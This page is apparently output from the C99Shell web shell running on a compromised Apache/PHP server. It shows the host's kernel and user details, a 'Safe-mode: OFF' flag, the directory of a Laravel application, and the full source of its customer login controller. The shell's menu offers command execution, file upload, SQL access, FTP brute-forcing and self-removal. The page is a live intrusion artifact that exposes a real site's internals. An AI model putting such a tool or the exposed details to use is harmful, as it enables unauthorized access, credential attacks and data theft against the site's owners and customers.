!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picotext.picotech.app/public_html/app/Http/Controllers/Auth/   drwxr-xr-x
Free 23.29 GB of 117.98 GB (19.74%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CustomerLoginController.php (1.37 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Http\Controllers\Auth;

use 
App\Events\SendMail;
use 
App\Http\Controllers\Controller;
use 
App\Models\BillingRequest;
use 
App\Models\Customer;
use 
App\Models\Domain;
use 
App\Models\Label;
use 
App\Models\Number;
use 
App\Models\Plan;
use 
App\Models\Settings;
use 
App\Models\User;
use 
App\Models\VerifyCustomer;
use 
App\Models\Wallet;
use 
Carbon\Carbon;
use 
foo\bar;
use 
Illuminate\Http\Request;
use 
Illuminate\Support\Facades\Auth;
use 
Illuminate\Support\Facades\DB;
use 
Illuminate\Support\Facades\Log;
use 
Illuminate\Support\Facades\Mail;
use 
Illuminate\Support\Facades\URL;
use 
Illuminate\Support\Str;

class 
CustomerLoginController extends Controller
{
    public function 
index()
    {
        return 
view('auth.login');
    }

    public function 
authenticate(Request $request)
    {
        
$credentials['email'] = trim($request->email);
        
$credentials['password'] = trim($request->password);

        
$remember_me $request->has('remember_me');
        if (
Auth::guard('customer')->attempt($credentials$remember_me)) {
            return 
redirect()->route('customer.dashboard');
        }
        return 
back()->withErrors(['msg' => 'Invalid email or password. Please try again.']);
    }

    public function 
logout()
    {
        
auth('customer')->logout();
        return 
redirect()->route('login');
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.005 ]--